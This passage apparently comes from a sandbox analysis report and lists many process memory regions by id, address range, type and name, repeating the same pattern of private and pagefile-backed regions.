end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10964 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 10965 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 10966 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 10967 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11018 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11019 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11020 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11021 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11022 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11224 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11225 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11226 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11227 
start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11228 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11293 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11294 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11295 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11296 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11297 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11400 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11401 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11402 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11403 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11404 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11447 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: 
id = 11448 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11449 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11450 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11451 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11694 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11695 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11696 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11697 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11698 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11735 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11736 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11737 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11738 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" 
filename = "" Region: id = 11739 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 11943 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11944 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 11945 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 11946 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11947 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12013 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12014 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12015 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12016 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12017 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12244 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12245 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001750000" filename = "" Region: id = 12246 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12247 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12248 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12349 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12350 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12351 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12352 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12353 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12588 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12589 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12590 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12591 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12592 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12642 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12643 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12644 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12645 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12646 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12909 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12910 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12911 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12912 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12913 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12959 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12960 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 12961 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 12962 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 12963 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13128 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13129 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13130 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13131 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13132 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13182 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13183 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13184 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13185 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13186 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13377 start_va = 0x1d0000 end_va = 0x1dffff 
entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13378 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13379 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13380 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13381 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13382 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13433 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13434 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13435 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13436 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13605 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13606 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13607 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13608 start_va = 0x1e0000 
end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13609 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13610 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13611 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13612 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13613 start_va = 0x1e0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13614 start_va = 0x1d0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13815 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13816 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13817 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13818 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13819 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13820 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13821 start_va = 
0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13822 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13823 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13824 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13979 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13980 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13981 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13982 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13983 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 13984 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13985 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 13986 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 13987 start_va = 0x1e0000 end_va = 0x1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: 
id = 13988 start_va = 0x1d0000 end_va = 0x1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 14378 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14379 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 14380 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14381 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14382 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 14419 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14420 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 14421 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14422 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14423 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 14636 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14637 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = 
"" Region: id = 14638 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14639 start_va = 0x1e0000 end_va = 0x1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14640 start_va = 0x1d0000 end_va = 0x1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 14641 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14642 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 14643 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14644 start_va = 0x1e0000 end_va = 0x1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14645 start_va = 0x1d0000 end_va = 0x1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 14822 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14823 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 14824 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14825 start_va = 0x1e0000 end_va = 0x1f5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14826 start_va = 0x1d0000 end_va = 0x1e5fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 14827 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14828 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 14829 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 14830 start_va = 0x1e0000 end_va = 0x1f5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 14831 start_va = 0x1d0000 end_va = 0x1e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15018 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15019 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15020 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15021 start_va = 0x1e0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15022 start_va = 0x1d0000 end_va = 0x1e8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15023 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15024 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15025 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15026 start_va = 0x1e0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15027 start_va = 0x1d0000 end_va = 0x1e8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15177 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15178 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15179 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15180 start_va = 0x1e0000 end_va = 0x1f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15181 start_va = 0x1d0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15199 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15200 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15201 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15202 start_va = 0x1e0000 end_va = 0x1f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15203 start_va = 0x1d0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15342 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 
0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15343 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15344 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15345 start_va = 0x1e0000 end_va = 0x1f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15346 start_va = 0x1d0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15373 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15374 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15375 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15376 start_va = 0x1e0000 end_va = 0x1f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15377 start_va = 0x1d0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15834 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15835 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15836 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15837 start_va = 0x1e0000 end_va = 0x1f9fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15838 start_va = 0x1d0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15867 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15868 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 15869 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 15870 start_va = 0x1e0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15871 start_va = 0x1d0000 end_va = 0x1e8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" 